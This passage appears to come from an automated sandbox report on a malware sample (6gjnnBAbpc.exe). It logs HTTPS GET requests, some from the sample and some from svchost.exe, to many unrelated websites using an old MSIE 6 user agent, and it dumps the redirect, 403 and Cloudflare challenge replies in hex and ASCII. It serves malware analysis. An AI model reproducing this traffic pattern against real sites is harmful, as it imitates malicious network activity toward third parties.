                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC3206INData Raw: 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 67 2d 63 6f 70 79 72 69 67 68 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 20 73 69 7a 65 2d 33 33 2d 33 22 3e 0a 3c 64 69 76 20 69 64 3d 22 6c 6f 67 6f 2d 32 34 34 34 2d 70 61 72 74 69 63 6c 65 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 20 67 2d 70 61 72 74 69 63 6c 65 22 3e 20 3c 61 20 68 72 65 66 3d 22 2f 22 20 74 69 74 6c 65 3d 22 22 20 72 65 6c 3d 22 68 6f 6d 65
                                                                                                                                                                                                                                                                                                      Data Ascii: ></div></div></section></div></div></div></section><section id="g-copyright"><div class="g-container"> <div class="g-grid"><div class="g-block size-33-3"><div id="logo-2444-particle" class="g-content g-particle"> <a href="/" title="" rel="home
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC3208INData Raw: 35 30 32 0d 0a 2d 74 65 78 74 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 73 72 63 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 63 72 69 70 74 73 2f 35 63 35 64 64 37 32 38 2f 63 6c 6f 75 64 66 6c 61 72 65 2d 73 74 61 74 69 63 2f 65 6d 61 69 6c 2d 64 65 63 6f 64 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 6a 73 2f 6d 61 69 6e 2e 6a 73 22
                                                                                                                                                                                                                                                                                                      Data Ascii: 502-text"></span></a></div></div></div></div></div></section></div><script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script type="text/javascript" src="/media/gantry5/assets/js/main.js"
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC3209INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      82192.168.2.527450138.201.65.187443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC3044OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: diamir.de
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC3172INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:45:57 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                      Content-Length: 162
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Location: https://www.diamir.de/
                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC3172INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      83192.168.2.527463138.201.65.187443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC3173OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: www.diamir.de
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC3174INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:45:57 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                      Content-Length: 548
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC3174INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20
                                                                                                                                                                                                                                                                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      84192.168.2.52742949.212.235.175443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC3173OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: nts-web.net


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      85192.168.2.527460185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC3173OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: techtrans.de
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC3174INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:45:57 GMT
                                                                                                                                                                                                                                                                                                      Server: Apache
                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                                                      Expires: 0
                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                      Upgrade: h2,h2c
                                                                                                                                                                                                                                                                                                      Connection: Upgrade, close
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC3175INData Raw: 32 64 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 2f 68 65 61 64 3e 3c
                                                                                                                                                                                                                                                                                                      Data Ascii: 2de<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head><


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      86192.168.2.527473188.114.97.3443C:\Users\user\Desktop\6gjnnBAbpc.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC3175OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: hyab.se
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC3209INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:45:57 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Location: https://hyab.com
                                                                                                                                                                                                                                                                                                      Cache-Control: max-age=600
                                                                                                                                                                                                                                                                                                      Expires: Wed, 22 Mar 2023 04:55:57 GMT
                                                                                                                                                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2SOHRzMXJSGdqPuWOtauxedAUt3iB0P%2FhC7fhXxBjtdFBDomWbNsJrt5%2Bf2tziyrReSoS4VZRogL5GmmyfawGXxw7Xfb0TwOZeVZonrCjnuHeCQOISbu5nqs"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                                      CF-RAY: 7abbc9c2889b35e2-FRA
                                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC3210INData Raw: 63 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 79 61 62 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: c8<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://hyab.com">here</a>.</p></body></html>
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC3210INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      87192.168.2.527479188.114.96.3443C:\Users\user\Desktop\6gjnnBAbpc.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC3176OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: sigtoa.com
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC3210INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:45:57 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                                                                                      Cross-Origin-Resource-Policy: same-origin
                                                                                                                                                                                                                                                                                                      Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                                                                                                                                      Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                      Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                      Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=B%2FfIcPY92J7Ih5E94xA50MP4kxOA%2FSDB75T%2FYKFqFIZSeXDOW6Pq18xgBlEhy9EwnZnhPlrETWWkJv8RZIHnscnn7EI5HXXq%2FNoyzHX%2FK5RlHW5FA%2BQyCEEHHSTT"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                                      CF-RAY: 7abbc9c318f83648-FRA
                                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC3211INData Raw: 31 65 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d
                                                                                                                                                                                                                                                                                                      Data Ascii: 1e93<!DOCTYPE html><html lang="en-US"><head> <title>Just a moment...</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="X-UA-
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC3211INData Raw: 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e
                                                                                                                                                                                                                                                                                                      Data Ascii: Compatible" content="IE=Edge"> <meta name="robots" content="noindex,nofollow"> <meta name="viewport" content="width=device-width,initial-scale=1"> <link href="/cdn-cgi/styles/challenges.css" rel="stylesheet"> </head><body class="no-js">
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC3213INData Raw: 20 20 73 69 67 74 6f 61 2e 63 6f 6d 20 6e 65 65 64 73 20 74 6f 20 72 65 76 69 65 77 20 74 68 65 20 73 65 63 75 72 69 74 79 20 6f 66 20 79 6f 75 72 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 62 65 66 6f 72 65 20 70 72 6f 63 65 65 64 69 6e 67 2e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 69 64 3d 22 63 68 61 6c 6c 65 6e 67 65 2d 66 6f 72 6d 22 20 61 63 74 69 6f 6e 3d 22 2f 3f 5f 5f 63 66 5f 63 68 6c 5f 66 5f 74 6b 3d 47 73 37 38 47 6e 55 45 72 66 66 55 72 46 51 78 78 6a 74 46 39 69 54 4d 61 57 65 4d 4b 6e 63 33 76 5a 33 4d 49 5a 72 6d 30 46 49 2d 31 36 37 39 34 36 30 33 35 37 2d 30 2d 67 61 4e 79 63 47 7a 4e 43 50 73 22 20 6d 65 74 68 6f 64 3d 22 50 4f 53 54 22 20 65 6e 63 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69
                                                                                                                                                                                                                                                                                                      Data Ascii: sigtoa.com needs to review the security of your connection before proceeding. </div> <form id="challenge-form" action="/?__cf_chl_f_tk=Gs78GnUErffUrFQxxjtF9iTMaWeMKnc3vZ3MIZrm0FI-1679460357-0-gaNycGzNCPs" method="POST" enctype="applicati
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC3214INData Raw: 37 4e 55 49 6a 4d 66 4a 74 73 58 61 4a 49 45 42 2d 53 49 71 6b 71 73 79 49 73 2d 74 73 47 58 51 73 42 35 36 54 49 34 34 7a 74 58 6c 4a 7a 79 50 34 79 32 4a 34 45 48 5f 45 6a 62 6b 4c 65 68 53 35 5f 62 75 55 62 79 58 42 62 49 78 61 7a 37 49 7a 61 58 30 58 7a 79 37 6d 42 36 66 31 36 41 4e 6c 41 45 4a 33 34 53 64 44 79 47 71 64 68 30 6e 42 4e 65 51 53 51 35 63 39 59 33 42 55 33 4e 55 6f 57 6e 47 58 41 6c 63 5a 56 6f 70 33 6c 43 4c 49 75 74 70 56 53 31 36 33 2d 72 54 57 4d 69 6f 6f 58 56 4b 42 58 68 63 4c 4b 6a 2d 47 69 7a 49 79 33 79 77 45 46 46 65 30 38 34 69 76 4f 44 62 53 67 37 52 37 43 6d 73 38 51 75 50 50 67 6a 70 37 31 74 69 65 30 36 30 37 63 43 77 31 70 6e 6b 38 79 78 4d 5a 63 4a 47 6c 5f 79 56 67 69 38 71 57 61 61 63 6b 4e 33 75 54 4c 6a 32 7a 42 65
                                                                                                                                                                                                                                                                                                      Data Ascii: 7NUIjMfJtsXaJIEB-SIqkqsyIs-tsGXQsB56TI44ztXlJzyP4y2J4EH_EjbkLehS5_buUbyXBbIxaz7IzaX0Xzy7mB6f16ANlAEJ34SdDyGqdh0nBNeQSQ5c9Y3BU3NUoWnGXAlcZVop3lCLIutpVS163-rTWMiooXVKBXhcLKj-GizIy3ywEFFe084ivODbSg7R7Cms8QuPPgjp71tie0607cCw1pnk8yxMZcJGl_yVgi8qWaackN3uTLj2zBe
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC3215INData Raw: 64 3a 20 27 32 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 5a 6f 6e 65 3a 20 27 73 69 67 74 6f 61 2e 63 6f 6d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 4e 6f 75 6e 63 65 3a 20 27 35 30 32 34 39 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 52 61 79 3a 20 27 37 61 62 62 63 39 63 33 31 38 66 38 33 36 34 38 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 48 61 73 68 3a 20 27 65 66 31 62 32 35 34 62 64 39 31 63 35 37 34 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 47 73 37 38 47 6e 55 45 72 66 66 55 72 46 51 78 78 6a 74 46 39 69 54 4d 61 57 65 4d 4b 6e 63 33 76 5a 33 4d 49 5a 72 6d 30
                                                                                                                                                                                                                                                                                                      Data Ascii: d: '2', cZone: 'sigtoa.com', cType: 'managed', cNounce: '50249', cRay: '7abbc9c318f83648', cHash: 'ef1b254bd91c574', cUPMDTk: "\/?__cf_chl_tk=Gs78GnUErffUrFQxxjtF9iTMaWeMKnc3vZ3MIZrm0
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC3217INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 3a 20 27 6a 4e 37 70 39 75 74 77 4c 51 70 38 69 36 76 6e 43 6c 4c 6a 72 7a 57 37 44 62 36 53 74 72 74 4c 77 39 73 6a 33 58 48 75 4f 73 67 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 31 3a 20 27 39 78 58 41 32 46 74 58 42 51 33 31 6d 6c 2f 51 4d 59 34 50 2f 41 3d 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 32 3a 20 27 4d 7a 31 72 32 4e 37 42 70 68 63 4e 46 69 72 62 6c 6f 42 47 42 41 3d 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7a 68 3a 20 27 64 4c 68 39 34 5a 58 4c 73 4d 61 54 6f 47 44 33 2f 71 39 42 69 75 6d 61 63 36 79 78 51 56 55 5a 34 63 32 6a 74 34 59 4a 6e 61 55 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 75 68 3a 20 27 66 78 75 35 2f 69
                                                                                                                                                                                                                                                                                                      Data Ascii: m: 'jN7p9utwLQp8i6vnClLjrzW7Db6StrtLw9sj3XHuOsg=', i1: '9xXA2FtXBQ31ml/QMY4P/A==', i2: 'Mz1r2N7BphcNFirbloBGBA==', zh: 'dLh94ZXLsMaToGD3/q9Biumac6yxQVUZ4c2jt4YJnaU=', uh: 'fxu5/i
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC3218INData Raw: 3d 47 73 37 38 47 6e 55 45 72 66 66 55 72 46 51 78 78 6a 74 46 39 69 54 4d 61 57 65 4d 4b 6e 63 33 76 5a 33 4d 49 5a 72 6d 30 46 49 2d 31 36 37 39 34 36 30 33 35 37 2d 30 2d 67 61 4e 79 63 47 7a 4e 43 50 73 22 20 2b 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 63 4f 67 55 48 61 73 68 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 70 6f 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 69 73 74 6f 72 79 2e 72 65 70 6c 61 63 65 53 74 61 74 65 28 6e 75 6c 6c 2c 20 6e 75 6c 6c 2c 20 6f 67 55 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e
                                                                                                                                                                                                                                                                                                      Data Ascii: =Gs78GnUErffUrFQxxjtF9iTMaWeMKnc3vZ3MIZrm0FI-1679460357-0-gaNycGzNCPs" + window._cf_chl_opt.cOgUHash); cpo.onload = function() { history.replaceState(null, null, ogU); }; } document.getElementsByTagN
